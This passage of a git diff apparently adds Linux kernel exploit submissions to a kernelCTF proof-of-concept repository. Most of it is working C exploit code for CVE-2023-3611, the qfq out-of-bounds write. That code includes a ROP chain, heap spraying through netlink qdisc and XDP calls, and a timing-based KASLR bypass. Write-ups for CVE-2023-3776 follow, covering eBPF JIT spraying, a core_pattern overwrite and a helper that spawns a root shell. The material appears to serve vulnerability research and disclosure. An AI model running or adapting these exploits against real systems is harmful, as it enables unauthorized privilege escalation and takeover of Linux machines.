p64(find_task_by_vpid), + p64(pop_rcx_ret), + pad8('C'), // this is just to make sure that the div does not raise exception + p64(mov_rdi_rax), + p64(pop_rsi), + p64(init_nsproxy), + p64(switch_task_namespaces), + + // restore execution in qfq_enqueue + p64(pop_rcx_ret), + p64(framepp), + p64(pop_rdi), + p64(0x48), + p64(add_rcx_edi), + p64(pop_rsi), + p64(-0x5b), + p64(push_qword_rcx_rsi_0x5b_pop_rbp_pop_r12), + p64(0xdead000000000004), // scratch r12 + p64(leave), + }; + + _Static_assert(sizeof(rop) < sizeof(p->stack)); + memcpy(p->stack, rop, sizeof(rop)); + + p->org.protocol = 8; + p->org.classify = (void*)push_rsi_jmp_rsi_0x39; + p->org.ops = (void*)0xdead000000000000; +} + +void prep_stage1_large_payload(struct stab_payload* p) { + memset(p, 0, sizeof(*p)); + + // This index will control the bit we flip. + // 8192 - offsetof(struct Qdisc, privdata) - offsetof(struct qfq_sched, bitmaps)) // the rest of the first qdisc + // + 8192 // spacing of key payload + // + offsetof(struct Qdisc, privdata) + offsetof(struct qfq_sched, filter_list) // offset into the second qdisc + // (times 8 + FFS(0x80)) + p->group.index = (8192 - 384 - 72 + 8192 + 384 + 0) * 8 + 7; + + // see create_qfq_qisc for log scaling + p->sizetable[0] = 0; + p->sizetable[1] = LMAX >> 7; +} + +static int last_worker = 0; +static struct { + int pid; + void* stack; +} workers[200] = {0}; + +int spawn_worker(int (*target)(void*), void* arg) { + void* stack = workers[last_worker].stack; + + if (stack == NULL) { + stack = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); + FAIL_IF(stack == MAP_FAILED); + workers[last_worker].stack = stack; + } + + int child = clone(target, stack + 0x4000, CLONE_NEWUSER | CLONE_NEWNET | CLONE_VM, arg); + + if (child < 0) { + return -1; + } + + workers[last_worker].pid = child; + last_worker++; + + return last_worker - 1; +} + +int kill_worker(int index) { + if (workers[index].pid > 0) { + kill(workers[index].pid, SIGKILL); + workers[index].pid = -1; + } + + if (index == last_worker - 1) { + last_worker--; + } + + return 0; +} + +int netlink_errno(int fd, struct nlmsghdr* nlh) { + assert(nlh->nlmsg_type == NLMSG_ERROR); + struct nlmsgerr* e = NLMSG_DATA(nlh); + assert(nlh->nlmsg_len >= NLMSG_HDRLEN + NLMSG_ALIGN(sizeof(*e))); + + if (e->error != 0) { + E("netlink error: %d", e->error); + errno = -e->error; + } + + return e->error; +} + +int netlink_send_recv(int fd, void* buf, int size) { + struct iovec iov = { + .iov_base = buf, + .iov_len = size, + }; + struct msghdr msg = { + .msg_name = NULL, + .msg_namelen = 0, + .msg_iov = &iov, + .msg_iovlen = 1, + .msg_control = NULL, + .msg_controllen = 0, + .msg_flags = 0, + }; + if (sendmsg(fd, &msg, 0) < 0) { + perror("sendmsg()"); + return -1; + } + + msg.msg_flags = MSG_TRUNC; + msg.msg_iov = NULL; + msg.msg_iovlen = 0; + iov.iov_len = recvmsg(fd, &msg, MSG_PEEK | MSG_TRUNC); + if (iov.iov_len < 0) { + perror("recvmsg()"); + return -1; + } + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + return recvmsg(fd, &msg, 0); +} + +static volatile int wake = 0; +static volatile int done = 0; +static volatile int qdisc_trigger_bug = 0; +static volatile int qdisc_trigger_payload = 0; +// event which will be set whenever control is handed over back to main +static EVENT_DEFINE(parent_notify, __EVENT_UNSET); + +int prepare_device(int s, int ifindex) { + struct nlmsghdr* nlh = calloc(1, 4096); + FAIL_IF(nlh == NULL); + + struct ifinfomsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWLINK; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + // Up the device + data->ifi_family = PF_UNSPEC; + data->ifi_type = 0; + data->ifi_index = ifindex; + data->ifi_flags = IFF_UP; + data->ifi_change = 1; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + attr->nla_type = IFLA_MTU; + attr->nla_len = NLA_HDRLEN + 4; + u32* attr_data = (void*)attr + NLA_HDRLEN; + *attr_data = 0x1000; + + nlh->nlmsg_len += attr->nla_len; + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to prepare device!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Create a rsvp tcfilter, used to spray our tcf_proto object +int create_tcfilter(int s, int ifindex, u32 parent, u16 prio) { + struct nlmsghdr* nlh = calloc(1, 4096); + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWTFILTER; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = parent; + data->tcm_handle = 0; + + u16 protocol = 8; + data->tcm_info = ((u32)prio << 16) | (u32)protocol; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + do { + attr->nla_type = TCA_KIND; + attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("rsvp") + 1); + + char* attr_data = (char*)attr + NLA_HDRLEN; + strcpy(attr_data, "rsvp"); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + int err = netlink_errno(s, nlh); + + // This sometimes shows EBUSY, but it still works? + // We just ignore the error, ... + if (err != -EBUSY && err != 0) { + E("failed to create tcfilter!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Create a netem qdisc with a large delay, used to slow down the enqueue / dequeue logic +int create_netem_qdisc(int s, int ifindex, u32 parent, u32 handle) { + struct nlmsghdr* nlh = calloc(2, 8192); + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWQDISC; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = parent; + data->tcm_handle = handle & 0xFFFF0000; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + do { + attr->nla_type = TCA_KIND; + attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("netem") + 1); + + char* attr_data = (char*)attr + NLA_HDRLEN; + strcpy(attr_data, "netem"); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + + attr->nla_type = TCA_OPTIONS; + attr->nla_len = NLA_HDRLEN + sizeof(struct tc_netem_qopt); + + struct tc_netem_qopt* netem_qopt = (void*)attr + NLA_HDRLEN; + netem_qopt->latency = 1000u * 1000 * 5000; // latency in us + // this limit is important: + // we want the first packet to be delayed indefinitely, but + // the second packet, which triggers the vuln, to be dropped. + netem_qopt->limit = 1; + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to create netem qdisc!"); + free(nlh); + return -1; + } + + free(nlh); + return 0; +} + +// Create a qfq qdisc, main qdisc of interest +int create_qfq_qisc(int s, int ifindex, u32 parent, u32 handle) { + struct nlmsghdr* nlh = calloc(1, 8192); + + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWQDISC; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = TC_H_ROOT; + data->tcm_handle = handle & 0xFFFF0000; + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + + do { + attr->nla_type = TCA_KIND; + attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("qfq") + 1); + + char* attr_data = (char*)attr + NLA_HDRLEN; + strcpy(attr_data, "qfq"); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + + + // Prepare the sizetable. This sizetable serves two purposes: + // - Trigger the vulnerability + // - Spray object in dyn-kmalloc-8192 with the fake qfq_group + // Essentially we setup a lookup table where the resulting + // packet size equals to (table[in_size >> 9] << 7) + // We choose those bitshifts to have some room for packet headers + // that we do not have to care about. + attr->nla_type = TCA_STAB; + attr->nla_len = NLA_HDRLEN; + + struct nlattr* nested = (void*)attr + NLA_HDRLEN; + nested->nla_type = TCA_STAB_BASE; + nested->nla_len = NLA_HDRLEN + sizeof(struct tc_sizespec); + attr->nla_len += nested->nla_len; + + struct tc_sizespec* sizespec = (void*)nested + NLA_HDRLEN; + // see prep_stage1_large_payload where we setup the sizetable + // we use the logscaling in combination with the lookup table to prevent + //other packets from triggering the bug + sizespec->cell_log = 9; + sizespec->size_log = 7; + sizespec->cell_align = 0; + sizespec->overhead = 0; + sizespec->linklayer = 0; + sizespec->mpu = 0; + sizespec->mtu = 0; + sizespec->tsize = sizeof(struct stab_payload) / sizeof(u16); + + nested = (void*)nested + nested->nla_len; + nested->nla_type = TCA_STAB_DATA; + nested->nla_len = NLA_HDRLEN + sizespec->tsize * sizeof(u16); + attr->nla_len += nested->nla_len; + + fake_group.id++; + memcpy((void*)nested + NLA_HDRLEN, &fake_group, sizeof(fake_group)); + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to create qfq qdisc!"); + free(nlh); + return -1; + } + +free(nlh); +return 0; +} + +// Add a helper class to a qdisc +int create_helper_class(int s, int ifindex, u32 class_handle, u32 sub_qdisc_handle, u32 lmax) { + struct nlmsghdr* nlh = calloc(1, 4096); + + struct tcmsg* data = NLMSG_DATA(nlh); + nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN; + nlh->nlmsg_type = RTM_NEWTCLASS; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE; + nlh->nlmsg_seq = 0; + nlh->nlmsg_pid = 0; + + data->tcm_family = PF_UNSPEC; + data->tcm_ifindex = ifindex; + data->tcm_parent = TC_H_ROOT; + data->tcm_handle = class_handle; + + + struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data)); + struct nlattr* nested; + + do { + attr->nla_type = TCA_OPTIONS; + attr->nla_len = NLA_HDRLEN; + + if (lmax) { + nested = (void*)attr + NLA_HDRLEN; + nested->nla_type = TCA_QFQ_LMAX; + nested->nla_len = NLA_HDRLEN + sizeof(u32); + attr->nla_len += nested->nla_len; + *(u32*)((void*)nested + NLA_HDRLEN) = lmax; + } + + nlh->nlmsg_len += attr->nla_len; + attr = (void*)attr + attr->nla_len; + } while (0); + + int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len); + if (recvlen < 0) { + perror("recv()"); + free(nlh); + return -1; + } + + if (netlink_errno(s, nlh) != 0) { + E("failed to create helper class!"); + free(nlh); + return -1; + } + free(nlh); + + if (sub_qdisc_handle != 0) { + return create_netem_qdisc(s, ifindex, class_handle, sub_qdisc_handle); + } + + return 0; +} + +int spray_one_umem(void* buf) { + struct xdp_umem_reg mr = {0}; + // __u64 addr; /* Start of packet data area */ + // __u64 len; /* Length of packet data area */ + // __u32 chunk_size; + // __u32 headroom; + // __u32 flags; + + mr.addr = (u64)buf; + mr.chunk_size = 0x1000; + mr.len = 4 * 0x1000; // anything other than 8 is fine (the protocol we try to classify with the fake proto) + mr.headroom = 0; + mr.flags = 0; + + int s = socket(AF_XDP, SOCK_RAW, 0); + FAIL_IF(s < 0); + + FAIL_IF(setsockopt(s, SOL_XDP, XDP_UMEM_REG, &mr, sizeof(mr)) < 0); + return s; +} + +// Worker to spray qdiscs and potentially trigger the vulnerabilty. +// Each worker will have its own network namespace and create qdiscs +// for the loopback device. +// We could create virtual devices, but here we are. +int bug_worker(void* arg) { + int i = *(int*)arg; + + FAIL_IF(_pin_to_cpu(0) != 0); + + const u32 handle = 0x10000000 | (i << 16); + const u32 handle_oob = handle | (1 << 0); + const u32 handle_help = handle | (1 << 1); + const u32 handle_faked1 = handle | (1 << 2); + + const u32 sub_handle_help = 0x20010000; + const u32 sub_handle_oob = 0x20020000; + + const int loindex = if_nametoindex("lo"); + + int s = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + FAIL_IF(s < 0); + + struct sockaddr_nl addr = {0}; + addr.nl_family = AF_NETLINK; + + FAIL_IF(bind(s, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + // Up the device and set the MTU to LMAX, which will trigger the vulnerability + // later on. + if (prepare_device(s, loindex) < 0) { + return -1; + } + + // Prepare qfq qdisc without anything else. + // Eventually we will create everything of interest when we pull the trigger. + // Until that this qdisc serves as some kind of "grooming" object. + if (create_qfq_qisc(s, loindex, TC_H_ROOT, handle) < 0) { + return -1; + } + + #define NUM_SOCKETS2 4 + int payloads[NUM_SOCKETS2*2] = {0}; + + #define _WAIT_FOR_WAKEUP() { \ + while (wake != i) { \ + sleep(1); \ + if (done) { \ + return 0; \ + } \ + } \ + wake = 0; \ + } + + for (int i = 0; i < NUM_SOCKETS2*2; i++) { + if (payloads[i] > 0) { + close(payloads[i]); + payloads[i] = 0; + } + } + for (int i = 0; i < NUM_SOCKETS2; i++) { + payloads[i] = spray_one_umem(payload); + FAIL_IF(payloads[i] < 0); + } + FAIL_IF(create_tcfilter(s, loindex, handle, 0x1111) != 0); + for (int i = 0; i < NUM_SOCKETS2; i++) { + payloads[i + NUM_SOCKETS2] = spray_one_umem(payload); + FAIL_IF(payloads[i + NUM_SOCKETS2] < 0); + } + + EVENT_SET(parent_notify); + _WAIT_FOR_WAKEUP(); + + if (i == qdisc_trigger_bug) { + L("worker %d is entering stage 1b: trigger vulnerability", i); + + L("trying to prepare helper class .."); + // This is a real helper class: We use it to make the code below follow + // certain paths in sch_qfq.c + // We require the following: + // - qfq_sch->in_serv_agg != NULL + // - qfq_sch->in_serv_agg != OOB agg + // We use a netem qdisc with a large delay to consistently hit the window + // between qfq_enqueue -> qfq_dequeue where the in_serv_agg would be reset. + if (create_helper_class(s, loindex, handle_help, sub_handle_help, 0x1000) != 0) { + E("failed to create helper class :("); + return -1; + } + + L("trying to prepare oob class .."); + // Class which will carry the aggregate with the OOB group + // In order to hit the desired update code paths, this class needs + // packets in its (sub)qdisc. + if (create_helper_class(s, loindex, handle_oob, sub_handle_oob, 0x2000) != 0) { + E("failed to create oob class :("); + return -1; + } + + L("activating helper agg .."); + u8 buf[1 << 9] = {0}; + + int sc, ss; + struct sockaddr_in addr; + u32 addr_len; + + ss = socket(AF_INET, SOCK_DGRAM, 0); + FAIL_IF(ss < 0); + sc = socket(AF_INET, SOCK_DGRAM, 0); + FAIL_IF(sc < 0); + + addr.sin_family = AF_INET; + addr.sin_port = 0; + addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + + addr_len = sizeof(addr); + + FAIL_IF(bind(ss, (struct sockaddr*)&addr, addr_len) < 0); + FAIL_IF(getsockname(ss, (struct sockaddr*) &addr, &addr_len) < 0) + + // set in_serv_agg = helper agg + FAIL_IF(setsockopt(sc, SOL_SOCKET, SO_PRIORITY, &handle_help, sizeof(handle_help)) < 0); + FAIL_IF(sendto(sc, buf, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + // make (not-yet) oob class active + FAIL_IF(setsockopt(sc, SOL_SOCKET, SO_PRIORITY, &handle_oob, sizeof(handle_oob)) < 0); + FAIL_IF(sendto(sc, buf, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + // trigger vulnerability + // note that this packet will be dropped by the child (netem) qdisc + FAIL_IF(sendto(sc, buf, 1 << 9, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + close(ss); + close(sc); + + EVENT_SET(parent_notify); + _WAIT_FOR_WAKEUP(); + return -1; + } + + { + // trigger payload + + int sc, ss; + struct sockaddr_in addr; + u32 addr_len; + ss = socket(AF_INET, SOCK_DGRAM, 0); + FAIL_IF(ss < 0); + sc = socket(AF_INET, SOCK_DGRAM, 0); + FAIL_IF(sc < 0); + + addr.sin_family = AF_INET; + addr.sin_port = 0; + addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + + addr_len = sizeof(addr); + + FAIL_IF(bind(ss, (struct sockaddr*)&addr, addr_len) < 0); + FAIL_IF(getsockname(ss, (struct sockaddr*) &addr, &addr_len) < 0) + + // trigger, what we send does not matter + FAIL_IF(sendto(sc, &addr, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + maybe_win(); + + // payload failed .. + EVENT_SET(parent_notify); + _WAIT_FOR_WAKEUP(); + + return -1; + } +} + +int main(int argc, char* argv[]) { + // main orchestration routine. + + // Hopefully less noise due to thread creation + FAIL_IF(_pin_to_cpu(1) != 0); + + if (argc == 2) { + u64 base = strtoull(argv[1], NULL, 16); + L("using supplied kernel base: %llx", base); + u64 diff = base - 0xffffffff81000000ull; + L("diff: %llx", diff); + + #define __x(name) { name += diff; L("corrected %s to %p", #name, (void*)name); } + FOR_ALL_OFFSETS(__x); + #undef __x + } else { + FAIL_IF(get_kernel_base() < 0); + } + + payload = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); + FAIL_IF(payload == MAP_FAILED); + prep_tcf_proto_payload(payload); + prep_stage1_large_payload(&fake_group); + + for (int try = 0; try < 10; try++) { + int worker_i = 1; + + L("spraying qdiscs .."); + for (worker_i = 1; worker_i <= ATTEMPT_LARGE_EVERY; worker_i++) { + FAIL_IF(spawn_worker(&bug_worker, &worker_i) < 0); + EVENT_WAIT(parent_notify); + } + + worker_i--; + qdisc_trigger_bug = 10; + + wake = qdisc_trigger_bug; + EVENT_WAIT(parent_notify); + + L("triggering payloads .."); + for (int i = 1; i <= worker_i; i++) { + if (i != qdisc_trigger_bug) { + wake = i; + EVENT_WAIT(parent_notify); + } + } + + E("attempt failed .("); + while (last_worker > 0) { + kill_worker(last_worker - 1); + } + sleep(1); + } + + E("we failed .("); + return 0; +} + +// KASLR bypass +// +// This code is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h +// +inline __attribute__((always_inline)) uint64_t rdtsc_begin() { + uint64_t a, d; + asm volatile ("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_end() { + uint64_t a, d; + asm volatile( + "xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + + +void prefetch(void* p) +{ + asm volatile ("prefetchnta (%0)" : : "r" (p)); + asm volatile ("prefetcht2 (%0)" : : "r" (p)); +} + + +#define FLUSH_SIZE (4*1024*1024) +u8 __mem[FLUSH_SIZE]; + +inline void flush_cache() { + for (int i = 0; i < FLUSH_SIZE; i++) { + __mem[i] = i; + } +} + +size_t flushandreload(void* addr) // row miss +{ + flush_cache(); + size_t time = rdtsc_begin(); + prefetch(addr); + size_t delta = rdtsc_end() - time; + return delta; +} + +int get_kernel_base() { + L("getting kernel base address .."); + + #define START 0xffffffff80000000ull + #define END 0xfffffffff0000000ull + #define STEP 0x0000000001000000ull + size_t times[(END - START) / STEP] = {0}; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + u64 addr = START + STEP * (u64)ti; + size_t t = flushandreload((void*)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + size_t minv = ~0; + size_t mini = -1; + for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) { + if (times[ti] < minv) { + mini = ti; + minv = times[ti]; + } + } + + if (mini < 0) { + return -1; + } + + leak_kernel_base = START + STEP * (u64)mini; + L("likely kernel base: %p (%zu)", (void*)leak_kernel_base, times[mini]); + + i64 diff = 0xffffffff81000000 - leak_kernel_base; + L("diff: %lld", diff); + + #define __x(name) { name -= diff; L("corrected %s to %p", #name, (void*)name); } + FOR_ALL_OFFSETS(__x); + #undef __x + return 0; +} diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/metadata.json new file mode 100644 index 00000000..d1e757e1 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/metadata.json @@ -0,0 +1,31 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp55"], + "vulnerability": { + "summary": "qfq_change_agg() function in net/sched/sch_qfq.c allows an out-of-bounds write because lmax is updated according to packet sizes without bounds checks.", + "cve": "CVE-2023-3611", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3e337087c3b5805fe0b8a46ba622a962880b5d64", + "affected_versions": ["3.0.0 - 6.5.0"], + "requirements": { + "attack_surface": ["userns"], + "capabilities": ["CAP_NET_ADMIN"], + "kernel_config": [ + "CONFIG_NET_SCH_QFQ" + ] + } + }, + "exploits": { + "lts-6.1.35": { + "environment": "lts-6.1.35", + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes": "30-50% success rate" + }, + "mitigation-6.1": { + "environment": "mitigation-6.1", + "uses": ["userns"], + "requires_separate_kaslr_leak": true, + "stability_notes": "5% success rate" + } + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/original.tar.gz b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/original.tar.gz new file mode 100644 index 00000000..68aed2a2 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/original.tar.gz differ diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-3776_lts/docs/exploit.md new file mode 100644 index 00000000..c192f813 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3776_lts/docs/exploit.md @@ -0,0 +1,230 @@ +### Triggering Vulnerability +Using this vulnerability, we can set reference counter of qdisc class to 0, and then free qdisc class (by deleting the class) while it still attached to the active filter. +When packet sent to the network, it will enqueue to the network scheduler. If the packet match to our filter, then it will return our freed qdisc class. +Qdisc class object contain qdisc object which used to enqueue packets to the respective network interface via function pointer. + +Snippet code if we use drr_class as target object as target object. + +```c++ +static int drr_enqueue(struct sk_buff *skb, struct Qdisc *sch, + struct sk_buff **to_free) +{ + unsigned int len = qdisc_pkt_len(skb); + struct drr_sched *q = qdisc_priv(sch); + struct drr_class *cl; + int err = 0; + bool first; + + cl = drr_classify(skb, sch, &err); // [1] + ... + err = qdisc_enqueue(skb, cl->qdisc, to_free); + ... + return err; +} + +static inline int qdisc_enqueue(struct sk_buff *skb, struct Qdisc *sch, + struct sk_buff **to_free) +{ + qdisc_calculate_pkt_len(skb, sch); + return sch->enqueue(skb, sch, to_free); // [2] +} +``` + +In [1], drr_classify will return freed `drr_class`, then this freed object is used to get the qdisc object via `cl->qdisc` and passed to `qdisc_enqueue` function. If we can control `cl->qdisc->enqueue` we can get RIP control at [2]. + +### Target objects +Our target objects is `struct drr_class` that resides inside kmalloc-128. + +### Spray objects + +#### For LTS/COS instance + +Since there is no CONFIG_KMALLOC_SPLIT_VARSIZE, we can reallocated `struct drr_class` with `ctl_buf`. We use sendmsg to spray ctl_buf with controlled data in line [3]. + +```C +static int ____sys_sendmsg(struct socket *sock, struct msghdr *msg_sys, + unsigned int flags, struct used_address *used_address, + unsigned int allowed_msghdr_flags) +... + BUILD_BUG_ON(sizeof(struct cmsghdr) != + CMSG_ALIGN(sizeof(struct cmsghdr))); + if (ctl_len > sizeof(ctl)) { + ctl_buf = sock_kmalloc(sock->sk, ctl_len, GFP_KERNEL); + if (ctl_buf == NULL) + goto out; + } + err = -EFAULT; + if (copy_from_user(ctl_buf, msg_sys->msg_control_user, ctl_len)) //[3] + goto out_freectl; +``` + +#### For Mitigation instance +Because CONFIG_KMALLOC_SPLIT_VARSIZE is enable, we need to find a struct we can spray in kmalloc-128 fixed cache. We found out `struct ctnetlink_filter` is in the right cache. We can spray it and put payload. + +```C +static struct ctnetlink_filter * +ctnetlink_alloc_filter(const struct nlattr * const cda[], u8 family) +{ + struct ctnetlink_filter *filter; + int err; +... + + filter = kzalloc(sizeof(*filter), GFP_KERNEL); +... + err = ctnetlink_parse_zone(cda[CTA_ZONE], &filter->zone); + if (err < 0) + goto err_filter; + + err = ctnetlink_parse_filter(cda[CTA_FILTER], filter); + if (err < 0) + +``` + +### KASLR Bypass +#### Spray eBPF programs +Our goal is to do some eBPF JIT spraying so later when we control kernel RIP, it will jump to the JIT page and execute our shellcode. + +Linux kernel provide a socket option `SO_ATTACH_FILTER` and let user to attach a classic BPF program to the socket for use as a filter of incoming packets. + +By creating lots of sockets and attach to classic BPF program, we can spray a lot of eBPF programs in kernel. +```cpp + struct sock_fprog prog = { + .len = TSIZE, + .filter = filter, + }; + for(int i=0;iqdisc` to fixed kernel address that contain our controlled value, and then set `enqueue` function pointer to guessed ebpf JIT address. + +### Post RIP + +Once we control the kernel RIP and jump into the middle of our eBPF program, the shellcode we crafted will cause core_pattern being overwritten to `|/proc/%P/fd/666`: + +We then use memfd and write an executable file payload in fd 666. +```C +int check_core() +{ + // Check if /proc/sys/kernel/core_pattern has been overwritten + char buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, buf, sizeof(buf)); + close(core); + return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; +} +void crash(char *cmd) +{ + int memfd = memfd_create("", 0); + SYSCHK(sendfile(memfd, open("root", 0), 0, 0xffffffff)); + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + sleep(1); + *(size_t *)0 = 0; +} +``` + +Later when coredump happened, it will execute our executable file as root in root namespace: +```C +*(size_t*)0=0; //trigger coredump +``` + +Executable file `root` is used to spawn shell when coredump happened. This is the code looks like: +```c++ +void* job(void* x){ + FILE* fp = popen("pidof billy","r"); + fread(buf,1,0x100,fp); + fclose(fp); + int pid = strtoull(buf,0,10); + int pfd = syscall(SYS_pidfd_open,pid,0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd,0); + dup2(stdoutfd,1); + dup2(stderrfd,2); + execlp("bash","bash",NULL); + +} +int main(int argc,char** argv){ + job(0); +} +``` \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-3776_lts/docs/vulnerability.md new file mode 100644 index 00000000..7133fb02 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3776_lts/docs/vulnerability.md @@ -0,0 +1,12 @@ +- Requirements: + - Capabilites: CAP_NET_ADMIN + - Kernel configuration: CONFIG_NET_SCHED=y, CONFIG_NET_CLS_FW=y + - User namespaces required: Yes +- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/diff/net/sched/cls_fw.c?id=1da177e4c3f4 +- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=0323bce598eea038714f941ce2b22541c46d488f +- Affected Version: v2.6.12-rc2 - v6.5-rc7 +- Affected Component: net/sched +- Syscall to disable: disallow unprivileged username space +- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-3776 +- Cause: Use-After-Free +- Description: A use-after-free vulnerability in the Linux kernel's net/sched: cls_fw component can be exploited to achieve local privilege escalation. If tcf_change_indev() fails, fw_set_parms() will immediately return an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and set it to zero, they can cause the reference to be freed, leading to a use-after-free vulnerability \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/Makefile b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/Makefile new file mode 100644 index 00000000..50edad6f --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/Makefile @@ -0,0 +1,18 @@ +exploit: poc root run.sh + tar czf ./poc.tar.gz root poc POC ip0 ip1 + cp run.sh exploit + fallocate -l 512 